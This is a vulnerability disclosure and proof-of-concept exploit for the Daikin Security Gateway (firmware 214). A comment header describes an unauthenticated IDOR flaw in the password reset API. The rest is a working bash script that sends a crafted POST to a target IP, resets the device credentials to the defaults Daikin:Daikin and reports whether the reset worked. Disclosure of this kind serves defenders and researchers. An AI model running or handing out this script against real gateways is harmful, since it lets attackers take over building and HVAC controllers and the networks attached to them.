# Daikin Security Gateway 214 - Remote Password Reset # Vendor: Daikin Industries, Ltd. # Product web page: https://www.daikin.com # https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html # Affected version: App: 100, Frm: 214 # # Summary: The Security gateway allows the iTM and LC8 controllers # to connect through the Security gateway to the Daikin Cloud Service. # Instead of sending the report to the router directly, the iTM or # LC8 controller sends the report to the Security gateway first. The # Security gateway transforms the report format from http to https # and then sends the transformed https report to the Daikin Cloud # Service via the router. Built-in LAN adapter enabling online control. # # Desc: The Daikin Security Gateway exposes a critical vulnerability # in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated # attacker can send a crafted POST request to this endpoint, bypassing # authentication mechanisms. Successful exploitation resets the system # credentials to the default Daikin:Daikin username and password combination. # This allows attackers to gain unauthorized access to the system without # prior credentials, potentially compromising connected devices and networks. # # Tested on: fasthttp # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2025-5931 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php # # # 21.03.2025 # [ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; } TARGET_IP="$1" URL="https://$TARGET_IP/api/settings/password/reset" PAYLOAD="t00t" [[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; } RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null) [ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; } if [[ $RESPONSE =~ \"Error\":0 ]]; then echo "Reset worked! Vulnerable." elif [[ $RESPONSE =~ \"Error\":1 ]]; then echo "Not vulnerable." else echo "Got: $RESPONSE" fi